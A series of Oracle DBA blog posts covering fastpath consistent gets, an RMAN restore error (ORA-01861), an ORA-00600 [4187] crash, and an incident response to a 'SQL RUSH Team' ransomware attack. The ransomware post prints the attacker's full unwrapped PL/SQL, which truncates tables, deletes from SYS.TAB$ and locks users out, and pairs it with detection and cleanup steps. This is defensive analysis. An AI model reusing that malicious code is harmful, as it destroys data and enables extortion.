 16     where ms.STATISTIC#=sn.STATISTIC#
 17      and sn.NAME in('consistent gets','consistent gets from cache','consistent gets - examination','consistent gets direct');
 18   end get_cg;
 19   /

Procedure created.

www.killdb.com@ declare
  2    l_cg_b  number;
  3    l_cg_a  number;
  4    p_cg_c_a number;
  5    p_cg_c_b number;
  6    l_cgfp_b number;
  7    l_cgfp_a number;
  8    p_cg_ex_b number;
  9    p_cg_ex_a number;
 10    p_cg_dir_b number;
 11    p_cg_dir_a number;
 12   begin
 13    get_cg(l_cg_b, p_cg_c_b,l_cgfp_b,p_cg_ex_b,p_cg_dir_b);
 14    for cur in (select n from (select mod(level, 1000)+1 l from dual connect by
 15  level <= 100000) l, t where t.n=l.l)
 16    loop
 17     null;
 18    end loop;
 19     get_cg(l_cg_a,p_cg_c_a, l_cgfp_a,p_cg_ex_a,p_cg_dir_a);
 20     dbms_output.put_line('consistent gets: '||to_char(l_cg_a-l_cg_b));
 21     dbms_output.put_line('consistent gets from cache: '||to_char(p_cg_c_a-p_cg_c_b));
 22     dbms_output.put_line('consistent gets from cache (fastpath): '||to_char(l_cgfp_a-l_cgfp_b));
 23     dbms_output.put_line('consistent gets - examination: '||to_char(p_cg_ex_a-p_cg_ex_b));
 24     dbms_output.put_line('consistent gets direct: '||to_char(p_cg_dir_a-p_cg_dir_b));
 25    end;
 26    /
consistent gets: 101001
consistent gets from cache: 101001
consistent gets from cache (fastpath):
consistent gets - examination: 100001
consistent gets direct: 0

PL/SQL procedure successfully completed.

www.killdb.com@
www.killdb.com@/
consistent gets: 101001
consistent gets from cache: 101001
consistent gets from cache (fastpath):
consistent gets - examination: 100001
consistent gets direct: 0

PL/SQL procedure successfully completed.

Clearly 10gR2 does not have this statistic at all. Now let's look at Oracle 11g (the feature was actually introduced in 11.1):

[oracle@killdb admin]$ sqlplus "/as sysdba" 

SQL*Plus: Release 11.2.0.4.0 Production on Tue Sep 20 12:22:10 2016

Copyright (c) 1982, 2013, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

www.killdb.com@create table t(
  2  n number,
  3  v varchar2(100),
  4  constraint pk_n primary key (n)); 

Table created.

www.killdb.com@insert into t
  2  select level, rpad('*', 100, '*')
  3   from dual
  4   connect by level <= 1000; 

1000 rows created.

www.killdb.com@create or replace procedure get_cg(
  2    p_cg out number,
  3    p_cg_c out number,
  4    p_cgfp out number,
  5    p_cg_ex out number,
  6    p_cg_dir out number
  7   ) is
  8   begin
  9    select max(case sn.NAME when 'consistent gets' then ms.value end),
 10    max(case sn.NAME when 'consistent gets from cache' then ms.value end),
 11      max(case sn.NAME when 'consistent gets from cache (fastpath)' then ms.value end),
 12      max(case sn.NAME when 'consistent gets - examination' then ms.value end),
 13      max(case sn.NAME when 'consistent gets direct' then ms.value end)
 14      into p_cg,p_cg_c, p_cgfp,p_cg_ex,p_cg_dir
 15     from v$mystat ms, v$statname sn
 16     where ms.STATISTIC#=sn.STATISTIC#
 17      and sn.NAME in('consistent gets','consistent gets from cache','consistent gets from cache (fastpath)','consistent gets - examination','consistent gets direct');
 18   end get_cg;
 19   /

Procedure created.

www.killdb.com@
www.killdb.com@
www.killdb.com@ declare
  2    l_cg_b  number;
  3    l_cg_a  number;
  4    p_cg_c_a number;
  5    p_cg_c_b number;
  6    l_cgfp_b number;
  7    l_cgfp_a number;
  8    p_cg_ex_b number;
  9    p_cg_ex_a number;
 10    p_cg_dir_b number;
 11    p_cg_dir_a number;
 12   begin
 13    get_cg(l_cg_b, p_cg_c_b,l_cgfp_b,p_cg_ex_b,p_cg_dir_b);
 14    for cur in (select n from (select mod(level, 1000)+1 l from dual connect by
 15  level <= 100000) l, t where t.n=l.l)
 16    loop
 17     null;
 18    end loop;
 19     get_cg(l_cg_a,p_cg_c_a, l_cgfp_a,p_cg_ex_a,p_cg_dir_a);
 20     dbms_output.put_line('consistent gets: '||to_char(l_cg_a-l_cg_b));
 21     dbms_output.put_line('consistent gets from cache: '||to_char(p_cg_c_a-p_cg_c_b));
 22     dbms_output.put_line('consistent gets from cache (fastpath): '||to_char(l_cgfp_a-l_cgfp_b));
 23     dbms_output.put_line('consistent gets - examination: '||to_char(p_cg_ex_a-p_cg_ex_b));
 24     dbms_output.put_line('consistent gets direct: '||to_char(p_cg_dir_a-p_cg_dir_b));
 25    end;
 26    /
  consistent gets: 2602
consistent gets from cache: 2602
consistent gets from cache (fastpath): 1400
consistent gets - examination: 1202
consistent gets direct: 0

PL/SQL procedure successfully completed.

As you can see, the statistics have changed. Running the same SQL in 10g and 11g shows a large difference in buffer gets: from about 100,000 down to roughly 2,600. In 11gR2, consistent gets from cache (fastpath) is 1,400, more than half of the total consistent gets (2,602). Clearly this is a significant performance improvement.

Further investigation shows that Oracle controls this feature through a hidden parameter, _fastpin_enable. Here is the setting in my virtual machine environment (which is also the default):

www.killdb.com@conn roger/roger
Connected.
www.killdb.com@show parameter fastpin

NAME                                 TYPE        VALUE
------------------------------------ ----------- ----------
_fastpin_enable                      integer     232205313

You can see that the parameter's value is fairly large. What happens if we change it to 0?

www.killdb.com@alter system set "_fastpin_enable"=0 scope=spfile; 

System altered.

www.killdb.com@shutdown immediate
Database closed.
Database dismounted.
ORACLE instance shut down.

www.killdb.com@set serveroutput on
www.killdb.com@@print_buffer.sql
consistent gets: 2639
consistent gets from cache: 2639
consistent gets from cache (fastpath): 0
consistent gets - examination: 1208
consistent gets direct: 0

PL/SQL procedure successfully completed.

www.killdb.com@conn roger/roger
Connected.
www.killdb.com@show parameter fastpin

NAME                                 TYPE        VALUE
------------------------------------ ----------- -----------
_fastpin_enable                      integer     0

www.killdb.com@conn /as sysdba
Connected.
www.killdb.com@@print_buffer.sql

PL/SQL procedure successfully completed.

www.killdb.com@set serveroutput on
www.killdb.com@@print_buffer.sql
consistent gets: 2602
consistent gets from cache: 2602
consistent gets from cache (fastpath): 0
consistent gets - examination: 1202
consistent gets direct: 0

PL/SQL procedure successfully completed.

As you can see, once the parameter is set to 0, the consistent gets from cache (fastpath) statistic drops to 0. Testing shows that any value greater than 1 is enough to enable this new feature.

What puzzles me, however, is that in the customer's CRM database the parameter already has a large default value, yet the fastpath statistic still shows nothing:

SQL> SELECT x.ksppinm NAME, y.ksppstvl VALUE, x.ksppdesc describ
  2    FROM SYS.x$ksppi x, SYS.x$ksppcv y
  3   WHERE x.indx = y.indx AND x.ksppinm LIKE '%&par%';
Enter value for par: fastpin
old   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%&par%'
new   3:  WHERE x.indx = y.indx AND x.ksppinm LIKE '%fastpin%'

NAME                           VALUE                DESCRIB
------------------------------ -------------------- ------------------------------------------------------------
_fastpin_enable                16777216             enable reference count based fast pins
SQL> select b.name, a.value
  2    from v$sysstat a, v$statname b
  3   where a.STATISTIC# = b.STATISTIC#
  4     and b.NAME like 'consistent gets%';

NAME                                                                            VALUE
-------------------------------------------------- ----------------------------------
consistent gets                                                         2920646704900
consistent gets from cache                                              2919483943030
consistent gets from cache (fastpath)                                               0
consistent gets - examination                                            947542697858
consistent gets direct                                                     1162762820

SQL>

As for how this mystery turns out, stay tuned for the next installment!

Related posts:

  1. 11g新特性之–Query Cache Result 研究
  2. 11g 新特性之–query result cache(2)
  3. 11g 新特性之–query result cache(3)
  4. library cache pin&lock (1)
  5. soft parse 和 library cache lock

Restore Database with ORA-01861


本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: Restore Database with ORA-01861

Today a customer asked me about a restore-to-a-different-host problem: the source database is a running production system, and a NetBackup (NBU) backup needs to be restored onto another server whose datafiles are all raw devices. Let's look at the error first:

RMAN> run{
2>
3> allocate channel t1 type 'sbt_tape';
4> allocate channel t2 type 'sbt_tape';
5> send 'NB_ORA_CLIENT=sth05v01';
6> set until time "to_date('2016-11-25 06:50:00','yyyy-mm-dd hh24:mi:ss')";
7> restore database;
8> release channel t1;
9> release channel t2;}

allocated channel: t1
channel t1: sid=540 devtype=SBT_TAPE
channel t1: Veritas NetBackup for Oracle - Release 7.5 (2012020801)

allocated channel: t2
channel t2: sid=539 devtype=SBT_TAPE
channel t2: Veritas NetBackup for Oracle - Release 7.5 (2012020801)

sent command to channel: t1
sent command to channel: t2

executing command: SET until clause

Starting restore at 01-DEC-16

released channel: t1
released channel: t2
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of restore command at 12/01/2016 14:46:30
ORA-01861: literal does not match format string

It is easy to see that the RMAN run failed. At first glance the error looks like an NLS_DATE_FORMAT issue. Indeed, when you use UNTIL TIME on the RMAN command line it is advisable to set NLS_DATE_FORMAT, either as an OS environment variable or via a SQL command inside RMAN. But that was not the cause here: setting it at the OS level or inside RMAN made no difference.
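For completeness, here is a minimal sketch of the two usual ways to set the date format before an UNTIL TIME restore (the format string is illustrative; note that NLS_LANG must also be set or the environment variable is ignored):

$ export NLS_DATE_FORMAT='yyyy-mm-dd hh24:mi:ss'
$ export NLS_LANG=american_america.ZHS16GBK      # value illustrative, match your database character set
$ rman target /

RMAN> sql "alter session set nls_date_format=''yyyy-mm-dd hh24:mi:ss''";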

For this problem, the Oracle MOS note RMAN Recovery Session Fails with ORA-1861 (Doc ID 852723.1) is quite detailed; it lists several solutions as well as checks to determine whether you have hit the bug it describes.

Unfortunately, when I ran the check script from that note, it returned no rows at all, which means this was not the problem described in the document.

So I went further and traced the session with rman target / debug trace=/tmp/rman.trc, and found that while executing the script RMAN failed on the following SQL:

RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of restore command at 12/01/2016 17:38:21
RMAN-06003: ORACLE error from target database:
ORA-01861: literal does not match format string
RMAN-06097: text of failing SQL statement: select fhscn ,to_date(fhtim,'MM/DD/RR HH24:MI:SS','NLS_CALENDAR=Gregorian') ,fhcrs ,fhrls ,to_date(fhrlc,'MM/DD/RR HH24:MI:SS','NLS_CALENDAR=Gregorian') ,fhafs ,fhrfs ,fhrft ,hxerr ,fhfsz ,fhsta into :b1,:b2:b3,:b4,:b5,:b6:b7,:b8:b9,:b10:b11,:b12:b13,:b14,:b15,:b16  from x$kcvfhall where hxfil=:b17
RMAN-06099: error occurred in source file: krmk.pc, line: 5655
DBGMISC:        ENTERED krmkursr [17:38:21.493]

DBGSQL:          EXEC SQL AT TARGET select decode(open_mode,'MOUNTED',0,'READ WRITE',1,'READ ONLY',1,0) into :b1  from v$database  [17:38:21.493]
DBGSQL:             sqlcode=0 [17:38:21.494]
DBGSQL:                :b1 = 0

From the output above, the select fhscn statement is the key to the error. Pulling that SQL out and running it on its own does indeed fail. Here is my test result:

SQL> select fhscn,
  2         to_date(fhtim, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  3         fhcrs,
  4         fhrls,
  5         to_date(fhrlc, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  6         fhafs,
  7         fhrfs,
  8         fhrft,
  9         hxerr,
 10         fhfsz,
 11         fhsta
 12    from x$kcvfhall
 13   where hxfil =252;
       to_date(fhtim, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
               *
ERROR at line 2:
ORA-01861: literal does not match format string

SQL> l
  1  select fhscn,
  2         to_date(fhtim, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  3         fhcrs,
  4         fhrls,
  5         to_date(fhrlc, 'MM/DD/RR HH24:MI:SS', 'NLS_CALENDAR=Gregorian'),
  6         fhafs,
  7         fhrfs,
  8         fhrft,
  9         hxerr,
 10         fhfsz,
 11         fhsta
 12    from x$kcvfhall
 13*  where hxfil < 252 or hxfil > 252
SQL> /

FHSCN            TO_DATE(FHTIM,'MM FHCRS            FHRLS            TO_DATE(FHRLC,'MM FHAFS            FHRFS            FHRFT                     HXERR      FHFSZ      FHSTA
---------------- ----------------- ---------------- ---------------- ----------------- ---------------- ---------------- -------------------- ---------- ---------- ----------
408027070532     02/23/88 02:19:50 0                0                                  313537986655                                                    8          0          0
339307855959     02/21/88 13:55:10 0                0                                  266292363311                                                    8          0          0
231931576374     02/07/88 04:01:52 0                0                                  206161641523                                                    8          0          0
214751510576     02/09/88 10:38:52 0                0                                  206161772597                                                    8          0          0
287767330911     03/02/88 17:11:37 0                0                                  313537593439                                                    8          0          0
287769034817     03/11/88 01:26:40 0                0                                  335013675081                                                    8          0          0
356487069774     03/11/88 01:26:33 0                0                                  335013675081                                                    8          0          0
257701183536     02/27/88 15:33:21 0                0                                  300653936719                                                    8          0          0
137441050656     01/25/88 06:33:04 0                0                                  137441050656                                                    8          0          0
0                                  0                0
......

From these results we can conclude that the information recorded for datafile 252 in the controlfile is probably problematic. This was the first time I had run into this issue. However, after dumping the controlfile contents and filtering for file=252, nothing looked abnormal:

sth14n01$(/oracle/app/admin/SETTLE/bdump)cat /oracle/app/product/10.2.0/db_1/rdbms/log/settle1_ora_10832.trc|grep 'File=252'
 RECID #39423 Recno 1071 Record timestamp  11/25/16 00:51:28 File=252 Incremental backup level=0
 RECID #38917 Recno 565 Record timestamp  11/17/16 20:53:38 File=252 Incremental backup level=0

RECID #39423 Recno 1071 Record timestamp  11/25/16 00:51:28 File=252 Incremental backup level=0
  File is part of the incremental strategy
  Backup set key: stamp=928792972, count=17980
  Creation checkpointed at scn: 0x0caf.169d9ef4 10/28/14 12:19:55
  File header checkpointed at scn: 0x0dc6.4f902943 11/24/16 22:02:53
  Resetlogs scn and time scn: 0x0000.0007c754 12/31/13 10:28:23
  Incremental Change scn: 0x0000.00000000
  Absolute Fuzzy scn: 0x0000.00000000
  Newly-marked media corrupt blocks  0 Total media corrupt blocks 0
  Total logically corrupt blocks 0  Block images written to backup 1048456
  File size at backup time 1048575  Block size 8192
  Low Offline Range Recid 0
  Number of blocks read during backup 1048575

   RECID #38917 Recno 565 Record timestamp  11/17/16 20:53:38 File=252 Incremental backup level=0
  File is part of the incremental strategy
  Backup set key: stamp=928173622, count=17846
  Creation checkpointed at scn: 0x0caf.169d9ef4 10/28/14 12:19:55
  File header checkpointed at scn: 0x0dc4.fb8c934d 11/17/16 18:00:23
  Resetlogs scn and time scn: 0x0000.0007c754 12/31/13 10:28:23
  Incremental Change scn: 0x0000.00000000
  Absolute Fuzzy scn: 0x0000.00000000
  Newly-marked media corrupt blocks  0 Total media corrupt blocks 0
  Total logically corrupt blocks 0  Block images written to backup 1048456
  File size at backup time 1048575  Block size 8192
  Low Offline Range Recid 0
  Number of blocks read during backup 1048575

As you can see, nothing in the dump looks wrong. The overall symptoms are very similar to, almost identical with, the bug described in the MOS note, yet the check script from that note finds nothing, which I found quite strange.

One caveat: I ran these checks on the production database, where the select statement also ran without any problem, which shows that the controlfile on the source production system is fine. Strictly speaking the checks should have been run on the new environment.

In short, this problem is rather odd. The good news is that it is not hard to work around: for example, restore the tablespaces while skipping datafile 252, then restore file 252 separately from its own backup afterwards.
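Leaving the exact "skip datafile" wording aside, the same idea can be expressed with plain RMAN commands: restore the unaffected files by number in one run, then bring back file 252 from its own backup in a second run. A sketch (the channel settings and NB_ORA_CLIENT are the ones from the failing script above; the datafile numbers are illustrative):

RMAN> run {
  allocate channel t1 type 'sbt_tape';
  send 'NB_ORA_CLIENT=sth05v01';
  set until time "to_date('2016-11-25 06:50:00','yyyy-mm-dd hh24:mi:ss')";
  restore datafile 1,2,3;      # the unaffected datafiles, listed explicitly by number
  release channel t1;
}

# then restore the problem file on its own
RMAN> run {
  allocate channel t1 type 'sbt_tape';
  send 'NB_ORA_CLIENT=sth05v01';
  restore datafile 252;
  release channel t1;
}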

Related posts:

  1. RMAN-06023 and ORA-19909 ?
  2. rman备份与large_pool_size的关系
  3. database crash with ora-00494
  4. dataguard主库丢失archivelog,如何不重建备库?
  5. Another one recover database case!

Bitcoin Ransomware Attack Resurfaces


本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: 比特币攻击案例重现江湖

At 4:50 this morning I took a call for help forwarded from the company's 400 hotline. It came from a hospital customer in Guangxi: their database had been attacked and the business had come to a complete standstill, and they sounded extremely anxious and pressed for time.

First, let's see what the database alert log says:

Sat Feb 11 23:32:57 2017
Errors in file D:\APP\ADMINISTRATOR\diag\rdbms\xxx\xxx\trace\xxx_ora_17664.trc:
ORA-00604: 递归 SQL 级别 1 出现错误
ORA-20313: 你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: 在 "PORTAL_HIS.DBMS_SYSTEM_INTERNAL         ", line 15
ORA-06512: 在 line 2
Sat Feb 11 23:32:57 2017
Errors in file D:\APP\ADMINISTRATOR\diag\rdbms\xxx\xxx\trace\xxx_ora_17672.trc:
ORA-00604: 递归 SQL 级别 1 出现错误
ORA-20313: 你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.
ORA-06512: 在 "PORTAL_HIS.DBMS_SYSTEM_INTERNAL         ", line 15
ORA-06512: 在 line 2
Sat Feb 11 23:33:13 2017

This is clearly cut from the same cloth as the Bitcoin ransomware attacks that broke out in November 2016, and once again it is the work of the "SQL RUSH Team". Evidently, despite all the publicity we gave these attacks last year, many enterprise customers still ignored the warnings, and today's tragedy is the result. Back to the point: how do we deal with it?

Based on the log, I queried the objects with recent DDL activity, and sure enough they matched what the alert log showed:

 

It is easy to see that these six objects are probably the key to the problem, so let's look at what they contain. First, the triggers:

Clearly these are malicious triggers created by the hacker. Unfortunately, although the names looked like this, their bodies could not be retrieved directly. So let's look at the stored procedures instead: all three turned out to be wrapped. After unwrapping them, the code looks like this:

PROCEDURE "DBMS_CORE_INTERNAL         " IS
  V_JOB   NUMBER;
  DATE1 INT :=10;
  STAT VARCHAR2(2000);
  V_MODULE VARCHAR2(2000);
  E1 EXCEPTION;
  PRAGMA EXCEPTION_INIT(E1, -20315);
  CURSOR TLIST IS SELECT * FROM USER_TABLES WHERE TABLE_NAME NOT LIKE '%$%' AND TABLE_NAME NOT LIKE '%ORACHK%' AND CLUSTER_NAME IS NULL;
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
   IF (DATE1>=1200) THEN
    FOR I IN TLIST LOOP
    DBMS_OUTPUT.PUT_LINE('table_name is ' ||I.TABLE_NAME);
    STAT:='truncate table '||USER||'.'||I.TABLE_NAME;
    DBMS_JOB.SUBMIT(V_JOB, 'DBMS_STANDARD_FUN9(''' || STAT || ''');', SYSDATE);
    COMMIT;
    END LOOP;
    END IF;
        IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
     THEN
      RAISE E1;
    END IF;
EXCEPTION
  WHEN E1 THEN
    RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
  WHEN OTHERS THEN
    RAISE_APPLICATION_ERROR(-20315,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
END;

PROCEDURE "DBMS_SUPPORT_INTERNAL         " IS
DATE1 INT :=10;
E1 EXCEPTION;
 PRAGMA EXCEPTION_INIT(E1, -20312);
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID,10)||' tablespace system  as select * from sys.tab$';
   DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
   COMMIT;
   EXECUTE IMMEDIATE 'alter system checkpoint';
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(11);
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(12);
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(13);
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
   FOR I IN 1..2046 LOOP
   DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
   DBMS_SYSTEM.KSDWRT(2, '你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库 ');
   END LOOP;
   RAISE E1;
   END IF;
   EXCEPTION
  WHEN E1 THEN
    RAISE_APPLICATION_ERROR(-20312,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
  WHEN OTHERS THEN
    NULL;
END;

PROCEDURE "DBMS_SYSTEM_INTERNAL         " IS
  DATE1 INT :=10;
  E1 EXCEPTION;
  PRAGMA EXCEPTION_INIT(E1, -20313);
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-MIN(LAST_ANALYZED)),0) INTO DATE1 FROM ALL_TABLES WHERE TABLESPACE_NAME NOT IN ('SYSTEM','SYSAUX','EXAMPLE');
   IF (DATE1>=1200) THEN
    IF (UPPER(SYS_CONTEXT('USERENV', 'MODULE'))!='C89239.EXE')
     THEN
      RAISE E1;
    END IF;
    END IF;
EXCEPTION
  WHEN E1 THEN
    RAISE_APPLICATION_ERROR(-20313,'你的数据库已被SQL RUSH Team锁死  发送5个比特币到这个地址 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (大小写一致)  之后把你的Oracle SID邮寄地址 sqlrush@mail.com 我们将让你知道如何解锁你的数据库  Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5JaZ6vrSE (case sensitive),  after that send your Oracle SID to mail address sqlrush@mail.com, we will let you know how to unlock your database.');
  WHEN OTHERS THEN
    NULL;
END;

Clearly the SQL RUSH Team knows Oracle quite well; they use the DBMS packages more fluently than most of us!

Only after reading the unwrapped code did it dawn on me: the hacker had appended 9 trailing spaces to the trigger and procedure names. Note that it is exactly 9 spaces, not one fewer.

Reading the first two procedures carefully, you can see this is a particularly nasty piece of work. It keeps submitting truncate table jobs in a loop, and before doing so it uses the tables' last analyzed time to estimate how long the database has been running; only if that exceeds 1200 days does the ransom behaviour fire (a long-running database is presumably a valuable one).

The last procedure blocks application connections, so the customer's business can no longer access the database. (A couple of detection queries are sketched below.)
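To catch this kind of payload early, two simple checks are to look for object names carrying trailing blanks and to compute the same "age" values the malicious code keys on. A minimal sketch (the tablespace filter mirrors the hacker's own code):

-- objects whose names end in blanks, like the hacker's triggers and procedures
select owner, object_type, object_name, last_ddl_time
  from dba_objects
 where object_name <> rtrim(object_name);

-- the "age" checks used by the malicious procedures (they fire at >= 1200 days)
select sysdate - min(last_analyzed) days_since_analyze
  from all_tables
 where tablespace_name not in ('SYSTEM','SYSAUX','EXAMPLE');

select sysdate - created days_since_created from v$database;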

Once you understand these three procedures, the fix is straightforward, roughly as follows:

1. alter system set job_queue_processes=0 scope=both; and restart the database (why restart? Because by now the database is full of library cache locks and is effectively unusable).

2. Drop the triggers and procedures above:

drop trigger portal_his."DBMS_CORE_INTERNAL         " ;
drop trigger portal_his."DBMS_SUPPORT_INTERNAL         " ;
drop trigger portal_his."DBMS_SYSTEM_INTERNAL         " ;

drop PROCEDURE portal_his."DBMS_CORE_INTERNAL         " ;
drop PROCEDURE portal_his."DBMS_SUPPORT_INTERNAL         " ;
drop PROCEDURE portal_his."DBMS_SYSTEM_INTERNAL         " ;

3. Remove the large number of jobs created by the hacker.

A check showed that 140,000 jobs had been created under the business schema portal_his. Since there were far too many to handle one by one, I simply generated the removal statements with SQL:

select 'exec dbms_ijob.remove('||job||');'
from dba_jobs
where schema_user='PORTAL_HIS' and what like '%truncate%';

4. Identify the tables that were truncated.

After the initial recovery the customer reported that the business was largely back to normal, but some business data was still missing: on closer inspection, the data in certain tables had disappeared. The customer could not say exactly which tables were affected, so how do we find out?

It is actually quite simple: use dba_objects.last_ddl_time to find which tables under the business schema were recently touched by DDL; 68 tables turned up. The data of these truncated tables was then recovered with ODU.
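A minimal sketch of that check (the schema name is the one from this case; the one-day window is illustrative):

select object_name, last_ddl_time
  from dba_objects
 where owner = 'PORTAL_HIS'
   and object_type = 'TABLE'
   and last_ddl_time > sysdate - 1      -- DDL (including truncate) within the last day
 order by last_ddl_time;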

 

Please check your own environments carefully so that problems like this do not happen again and cause losses to you or your company. If you do run into this kind of issue, contact us for professional support!

No related posts.

ORA-00600: internal error code, arguments: [4187]


本站文章除注明转载外,均为本站原创: 转载自love wife & love life —Roger 的Oracle技术博客

本文链接地址: ORA-00600: internal error code, arguments: [4187]

Not long ago, on a customer's Oracle RAC, one node's host crashed; after the reboot the database instance kept crashing, with the following messages:

Block recovery completed at rba 149666.7.16, scn 3562.2643076291
Non-fatal internal error happenned while SMON was doing flushing of monitored table stats.
SMON exceeded the maximum limit of 100 internal error(s).
Errors in file /oracle/app/oracle/diag/rdbms/abm/abm2/trace/abm2_smon_10879294.trc:
ORA-00600: internal error code, arguments: [4187], [],

From these errors it is clear that the SMON process hit an exception during its recovery work, and once the error count reaches 100, the instance is forcibly terminated and restarted.
Let's first look at the contents of the trace file:

ORA-00600: internal error code, arguments: [4187], [], [
Error 600 in redo application callback
Dump of change vector:
TYP:0 CLS:55 AFN:4 DBA:0x01000110 OBJ:4294967295 SCN:0x0dea.957d672f SEQ:1 OP:5.2 ENC:0 RBL:0
ktudh redo: slt: 0x0021 sqn: 0x00000001 flg: 0x0411 siz: 80 fbi: 0
            uba: 0x0107691f.9399.17    pxid:  0x0000.000.00000000
Block after image is corrupt:
buffer rdba: 0x01000110
scn: 0x0dea.957d672f seq: 0x01 flg: 0x04 tail: 0x672f2601
frmt: 0x02 chkval: 0xb7ac type: 0x26=KTU SMU HEADER BLOCK
Hex dump of corrupt header 3 = CHKVAL
Dump of memory from 0x07000102A717A000 to 0x07000102A717A014
。。。。。。
7000102A717BFF0 00000000 00000000 00000000           [............]
kcra_dump_redo_internal: skipped for critical process
Doing block recovery for file 4 block 272
Block header before block recovery:
buffer tsn: 4 rdba: 0x01000110 (4/272)
scn: 0x0dea.957d672f seq: 0x01 flg: 0x04 tail: 0x672f2601
frmt: 0x02 chkval: 0xb7ac type: 0x26=KTU SMU HEADER BLOCK
Resuming block recovery (PMON) for file 4 block 272
Block recovery from logseq 149687, block 51 to scn 15301400723442

From this information, Oracle suggests that an undo block may be damaged, since it reports "Block after image is corrupt". The buffer address is clearly file 4 block 272, so I first used dbv to check whether that file (an undo datafile) has any problems. Here is the dbv output:

ABM-DB2:oracle:/oracle/app/oracle/diag/rdbms/abm/abm2/trace$dbv userid=system/oracle  file='+DG_DATA/abm/datafile/undotbs2.263.819160701' blocksize=8192

DBVERIFY: Release 11.2.0.4.0 - Production on Fri Mar 17 21:26:44 2017

Copyright (c) 1982, 2011, Oracle and/or its affiliates.  All rights reserved.

DBVERIFY - Verification starting : FILE = +DG_DATA/abm/datafile/undotbs2.263.819160701

DBVERIFY - Verification complete

Total Pages Examined         : 1310720
Total Pages Processed (Data) : 0
Total Pages Failing   (Data) : 0
Total Pages Processed (Index): 0
Total Pages Failing   (Index): 0
Total Pages Processed (Other): 1310719
Total Pages Processed (Seg)  : 17
